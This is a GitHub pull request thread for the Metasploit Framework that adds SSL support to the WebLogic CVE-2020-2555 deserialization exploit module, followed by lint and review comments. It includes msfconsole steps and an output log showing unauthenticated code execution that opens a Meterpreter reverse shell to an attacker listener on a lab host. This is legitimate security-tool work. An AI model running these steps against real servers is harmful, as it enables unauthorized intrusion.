metasploit-framework
metasploit-framework copied to clipboard
rapid7
Weblogic t3s support
All of the T3 weblogic exploits fail over T3S, even though they can support it, this PR is to enable support on the first of them and I'll raise further PR's for the other exploits when I've completed testing across the suite and any comments are addressed in this branch (if the changes are wanted at all).
Verification
List the steps needed to make sure this thing works
- [ ] Start
msfconsole - [ ]
use exploit/multi/misc/weblogic_deserialize_badattrval - [ ]
set RPORT 7002 - [ ]
set SSL true - [ ]
run
Evidence
msf6 exploit(multi/misc/weblogic_deserialize_badattrval) > show info
Name: WebLogic Server Deserialization RCE - BadAttributeValueExpException
Module: exploit/multi/misc/weblogic_deserialize_badattrval
Platform: Unix, Linux, Windows
Arch: x86, x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2020-01-15
Provided by:
Jang
Y4er
Shelby Pace
Steve Embling
Available targets:
Id Name
-- ----
0 Windows
1 Unix
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.59.2 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 7002 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload information:
Description:
There exists a Java object deserialization vulnerability in multiple
versions of WebLogic. Unauthenticated remote code execution can be
achieved by sending a serialized BadAttributeValueExpException
object over the T3 protocol to vulnerable WebLogic servers.
References:
https://nvd.nist.gov/vuln/detail/CVE-2020-2555
https://www.thezdi.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server
https://github.com/Y4er/CVE-2020-2555
View the full module info with the info -d command.
msf6 exploit(multi/misc/weblogic_deserialize_badattrval) > show options
Module options (exploit/multi/misc/weblogic_deserialize_badattrval):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.59.2 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 7002 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.59.243 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Unix
View the full module info with the info, or info -d command.
msf6 exploit(multi/misc/weblogic_deserialize_badattrval) > run
[*] Started reverse TCP handler on 192.168.59.243:4444
[*] 192.168.59.2:7002 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.59.2:7002 - WebLogic version detected: 12.1.3.0.0
[+] 192.168.59.2:7002 - The target appears to be vulnerable.
[*] 192.168.59.2:7002 - Sending handshake...
[*] 192.168.59.2:7002 - Formatting payload...
[*] 192.168.59.2:7002 - Sending object...
[*] Sending stage (1017704 bytes) to 192.168.59.2
[*] 192.168.59.2:7002 - Command Stager progress - 101.56% done (717/706 bytes)
[*] Meterpreter session 16 opened (192.168.59.243:4444 -> 192.168.59.2:35646) at 2023-01-09 18:59:19 +0000
meterpreter >
additional comment to add, it looks like there might be a collision between the exploit modules both setting "SSL" option making it pretty misleading/confusing and possibly not as granular as intended.
https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/lib/msf/core/exploit/remote/tcp.rb#L65
vs
https://github.com/rapid7/metasploit-framework/blob/03d645016c8f5c957870fcc0eb45460cefa5d7e2/lib/msf/core/exploit/remote/tcp_server.rb#L21
So the info says it's setting on "incoming connections", but it looks like both incoming and outgoing might be using the same - I take it this is a known issue or does it need raising?
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.
We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:
rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>
You can automate most of these changes with the -a flag:
rubocop -a <directory or file>
Please update your branch after these have been made, and reach out if you have any problems.
![github-actions[bot] avatar](https://avatars.githubusercontent.com/in/15368?v=4 "Published by a pub.dev verified publisher"){kind=small}
All but one pre-existing lint issue has already been addressed as far as I can tell. Lint docs say "Notes" should only apply to new modules, and this isn't a new module, so I'm not sure this should be blocked on that basis? My time on this didn't extend to the Notes field from the original exploit, but if you were asking me to take an educated guess from what I've seen it would be:
- CRASH_SAFE
- IOC_IN_LOGS
- REPEATABLE_SESSION But did you want me to add those as a best effort, or should this be blocked until an authoritative source comes along?
Regarding the datastore SSL option - i've run into that before, its a mess to clean up.
@MetasploitTeam: what do folks think about changing the server mixin's DS option to ServeSSL or similar?
@steve-embling Sorry for the delay on this; not sure how it slipped through the cracks
Adding those notes you gave in https://github.com/rapid7/metasploit-framework/pull/17458#issuecomment-1377565329 would be great, as well as fixing this line:
C:121: 26: [Correctable] Style/AndOr: Use || instead of or.
I've just sent a final question to one of the developers that might have fixed the .get_once issue you ran into with SSL :+1: Or if you're able to rebase against the latest master code to verify if the change is still required or not - we could use that result to decide if the line can be reverted or not and get the PR landed faster 😄
as an aside, I'm now trying to port these changes over to the other modules, but something between January and now seems to have broken the changes in most the other modules. I wonder if its the get/get_once changes.
its also may be something purely environmental on my end, mind.
Code changes look good from a static code analysis point of view, thanks! :+1:
Release Notes
Updates the exploit/multi/misc/weblogic_deserialize_badattrval module to enable support for SSL/TLS